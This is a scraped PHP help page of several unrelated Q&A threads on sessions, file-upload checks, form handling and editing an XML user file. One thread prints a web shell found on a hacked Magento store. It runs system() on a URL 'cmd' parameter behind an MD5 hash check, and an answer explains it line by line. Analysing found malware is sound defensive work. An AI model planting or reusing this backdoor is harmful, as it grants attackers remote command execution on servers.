I want to check session data. The value of $_SESSION['yatidak'] is 'Tidak', but i can't check the condition. Why? Please see the code
$yt = $_SESSION['yatidak'];
echo $yt;
// output : Tidak
if ($yt=='Tidak') {
echo 'Tidak';
}else{
echo 'Iya';
}
// output : Iya
Echo should be :
// TidakTidak
But the result is :
// TidakIYa
The actual process is you have to do is,
session_start(); //at the very first line of the page
//Check the session value direct to the string and use trim if some white spaces are there should be removed and also use `===` which match type and data both
if (trim($_SESSION['yatidak']) === "Tidak") {
echo 'Tidak';
}else{
echo 'Iya';
}
// output sould be: Tidak
Please try this:
if ( ($yt = $_SESSION['yatidak']) == 'Tidak') {
echo 'Tidak';
}else{
echo 'Iya';
}
If that works, for adaptation of your code, make sure the $_SESSION['yatidak'] is not modified between the assignation and the verification.
Related
I'm trying to validate if a image is uploaded or not.
But I can't figure this out since 2 hours...:
Input: ""
My Code:
$_SESSION["errorMessage"] = empty($image);
Output: 1 (true)
Then I want to check if it isnt empty:
$_SESSION["errorMessage"] = !empty($image); // Or empty($image) == false
But then The Output is nothing?!?!
Even If I try the first one out it, when it should be true, gives out: ""
Can anyone help me with this problem?
When you echo a false value, it won't echo anything. You have to tell php what to show, e.g. echo $_SESSION["errorMessage"] ? 'true' : 'false'; In your case you may want to cast it to an int: $_SESSION["errorMessage"] = (int)empty($image); You could also use var_dump to verify, i.e. var_dump( $_SESSION["errorMessage"] );
You can use the UPLOAD_ERR_NO_FILE value:
function isset_file($file) {
return (isset($file) && $file['error'] != UPLOAD_ERR_NO_FILE);
}
if(isset_file($_FILES['input_name'])) {
// It's not empty
}
Since sending $_FILES['input_name'] may throw a Notice
function isset_file($name) {
return (isset($_FILES[$name]) && $_FILES[$name]['error'] != UPLOAD_ERR_NO_FILE);
}
if(isset_file('input_name')) {
// It's not empty
}
Another example to try:
if ($_FILES['theFile']['tmp_name']!='') {
// do this, upload file
} // if no file selected to upload, file isn't uploaded.
I want to make a call of this php logic inside a html div but when passing it as a function the logic breaks since it does not send an error message in case of entering the pass wrong and its confirmation at the time of performing the password change.
<?php
require 'funcs/conexion.php';
require 'funcs/funcs.php';
$user_id = $mysqli->real_escape_string($_POST['user_id']);
$token = $mysqli->real_escape_string($_POST['token']);
$password = $mysqli->real_escape_string($_POST['password']);
$con_password = $mysqli->real_escape_string($_POST['con_password']);
if(validaPassword($password, $con_password))
{
$pass_hash = hashPassword($password);
if(cambiaPassword($pass_hash, $user_id, $token))
{
echo "Contraseña Modificada <br> <a href='index_alumnos.php' >Iniciar Sesion</a>";
} else {
echo "Error al modificar contraseña";
}
} else {
echo "Las contraseñas no coinciden <br> <a href='index_alumnos.php' >contacta a Academia</a>";
}
?>
If the echo happens before your actual div is drawn, the echo goes... right where it happens. Which isn't within your div.
One way of getting around this would be to put your error message into a variable and then deliver this variable into your div (whether it be through a return value, if it's a call, or some other means.)
Here's a simple example to illustrate this:
<?php
if(1 === 2) {
//great, 1 is 2
} else {
//oh no, an error
$someErrorLine = '1 is not 2';
} ?>
<h1>Hi</h1>
<div><?= $someErrorLine ?></div>
You could also check if the variable exists, something like if(isset($someErrorLine)) {} and echo the div with it, or put the div within your variable.
I'm trying to recover a hacked Magento store, and found a file named magento.php in the errors folder within the Magento root directory. I know it's malicious but I can't really figure out what it's doing. Any ideas?
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {
echo "<pre>";
$cmd = ($_GET['cmd']);
$ret = system($cmd);
print $ret;
echo "</pre>";
die;
} else {
print "-1";
}
?>
It is simple php functionality which accessing parameters from the url and trying to execute the same.
<?php
if(md5($_GET["hash"])=="b4c44d5ce1c6c4b60c1c3d05a7d3e58d") {// check the hash parameter in the url and convert it to md5 standard. If that matches the value then execute steps inside this braces
echo "<pre>"; // print "<pre> tag on screen
$cmd = ($_GET['cmd']); // get the cmd parameter from url
$ret = system($cmd); // execute that cmd parameter as command
print $ret; // print the return value of the system function
echo "</pre>"; // print "</pre> tag on screen
die; // stop execution at this line
} else { // if hash do not match
print "-1"; // print -1 on screen
}
?>
I want to use PHP to check if $_POST["pass"] is set, and do something if it's not, and do something else if it is.... But I can't get it working, I'm sure my logic is wrong.
I have a php code that looks something like this...
if (!isset($_POST["pass"])) {
...some form with an input type text here...
if (...wrote the wrong thing in input type text...) {
echo "something is wrong....";
}
else {
$pass_var = "Pass";
$pass_var = $_POST["pass"];
}
}
else {
echo "This thing is working...";
}
If I type the right thing in my input type text, I wan't to get to "This thing is working", and if not I wan't to echo "something is wrong....".
It works almost fine, except that if I type the right thing in my form, I never get to "This thing is working...".
The page just does nothing..
I'm sure it's the
$pass_var = "Pass";
$pass_var = $_POST["pass"];
that I'm doing wrong.
I know that I could set this up in another way to make it work, but I have a large script that is set up like this, and I really want it to work...
You test in the form against the $_POST NOT being set (See the !). You want however the post to be set!
if(isset($_POST["pass"]))
{
print_r($_POST); // basic debugging -> Test the post array
echo "The form was submitted";
// ...some form with an input type text here...
if(...wrote the wrong thing in input type text...)
{
echo "something is wrong with the input....";
}
else
{
// Valid user input, process form
echo "Valid input byy the user";
$pass_var = "Pass";
$pass_var = $_POST["pass"];
}
}
else
{
echo "The form was not submitted...";
}
You can use the empty() function of php
if(!empty($_POST['pass'])){
// do something
}else{
// do something else
}
Hope this will work for you .
Make sure you have "method='POST'" in your html form else $_POST isn't accessible in php, and logic was a bit screwy, try this?
e.g.
if (!isset($_POST["pass"])) {
//no POST so echo form
echo "<form action='".$_SERVER['PHP_SELF']."' method='POST'>
<input type='text' name='txtInput' />
<input type='submit' name='pass' />
</form>";
} elseif (isset($_POST["pass"])) {
//have POST check txtInput for "right thing"
if ($_POST["txtInput"] == "wrong thing") {
echo "something is wrong....";
} elseif ($_POST["txtInput"] == "right thing") {
//$pass_var = "Pass";
$pass_var = $_POST["pass"];
echo "This thing is working...";
}
}
Well, if (!isset($_POST["pass"])) means if $_POST["pass"] is not set, so you might want to remove the '!' which stands for not.
well i'm writing a php code to edit tags and data inside those tags but i'm having big trouble getting my head around the thing.
basically i have an xml file similar to this but bigger
<users>
<user1>
<password></password>
</user1>
</users>
and the php code i'm using to try and change the user1 tag is this
function mod_user() {
// Get global Variables
global $access_level;
// Pull the data from the form
$entered_new_username = $_POST['mod_user_new_username'];
$entered_pass = $_POST['mod_user_new_password'];
$entered_confirm_pass = $_POST['mod_user_confirm_new_password'];
$entered_new_roll = $_POST['mod_user_new_roll'];
$entered_new_access_level = $_POST['mod_user_new_access_level'];
// Grab the old username from the last page as well so we know who we are looking for
$current_username = $_POST['mod_user_old_username'];
// !!-------- First thing is first. we need to run checks to make sure that this operation can be completed ----------------!!
// Check to see if the user exist. we just use the normal phaser since we are only reading and it's much easier to make loop through
$xml = simplexml_load_file('../users/users.xml');
// read the xml file find the user to be modified
foreach ($xml->children() as $xml_user_get)
{
$xml_user = ($xml_user_get->getName());
if ($xml_user == $entered_new_username){
// Set array to send data back
//$a = array ("error"=>103, "entered_user"=>$new_user, "entered_roll"=>$new_roll, "entered_access"=>$new_access_level);
// Add to session to be sent back to other page
// $_SESSION['add_error'] = $a;
die("Username Already exist - Pass");
// header('location: ../admin.php?page=usermanage&task=adduser');
}
}
// Check the passwords and make sure they match
if ($entered_pass == $entered_confirm_pass) {
// Encrypt the new password and unset the old password variables so they don't stay in memory un-encrytped
$new_password = hash('sha512', $entered_pass);
unset ($entered_pass, $entered_confirm_pass, $_POST['mod_user_new_password'], $_POST['mod_user_confirm_pass']);
}
else {
die("passwords did not match - Pass");
}
if ($entered_new_access_level != "") {
if ($entered_new_access_level < $access_level){
die("Access level is not sufficiant to grant access - Pass");
}
}
// Now to load up the xml file and commit changes.
$doc = new DOMDocument;
$doc->formatOutput = true;
$doc->perserveWhiteSpace = false;
$doc->load('../users/users.xml');
$old_user = $doc->getElementsByTagName('users')->item(0)->getElementsByTagName($current_username)->item(0);
// For initial debugging - to be deleted
if ($old_user == $current_username)
echo "old username found and matches";
// Check the variables to see if there is something to change in the data.
if ($entered_new_username != "") {
$xml_old_user = $doc->getElementsByTagName('users')->item(0)->getElementsByTagName($current_username)->item(0)->replaceChild($entered_new_username, $old_user);
echo "Username is now: " . $current_username;
}
if ($new_pass != "") {
$current_password = $doc->getElementsByTagName($current_user)->item(0)->getElementsByTagName('password')->item(0)->nodeValue;
//$replace_password = $doc
}
}
when run with just the username entered for change i get this error
Catchable fatal error: Argument 1 passed to DOMNode::replaceChild() must be an instance of DOMNode, string given, called in E:\xampp\htdocs\CGS-Intranet\admin\html\useraction.php on line 252 and defined in E:\xampp\htdocs\CGS-Intranet\admin\html\useraction.php on line 201
could someone explain to me how to do this or show me how they'd do it.. it might make a little sense to me to see how it's done :s
thanks
$entered_new_username is a string so you'll need to wrap it with a DOM object, via something like$doc->createElement()
$xml_old_user = $doc->getElementsByTagName('users')->item(0)->getElementsByTagName($current_username)->item(0)->replaceChild($doc->createElement($entered_new_username), $old_user);
This may not be quite right, but hopefully it points you in the correct direction.
alright got it writing and replacing the node that i want but i have ran into other issues i have to work out (IE: it's replacing the whole tree rather then just changing the node name)
anyway the code i used is
// For initial debugging - to be deleted
if ($old_user == $current_username)
echo "old username found and matches";
// Check the variables to see if there is something to change in the data.
if ($entered_new_username != "") {
try {
$new_node_name = $doc->createElement($entered_new_username);
$old_user->parentNode->replaceChild($new_node_name, $old_user);
}
catch (DOMException $e) {
echo $e;
}
echo "Username is now: " . $current_username;
}
if ($new_pass != "") {
$current_password = $doc->getElementsByTagName($current_user)->item(0)->getElementsByTagName('password')->item(0)->nodeValue;
//$replace_password = $doc
}
$doc->save('../users/users.xml');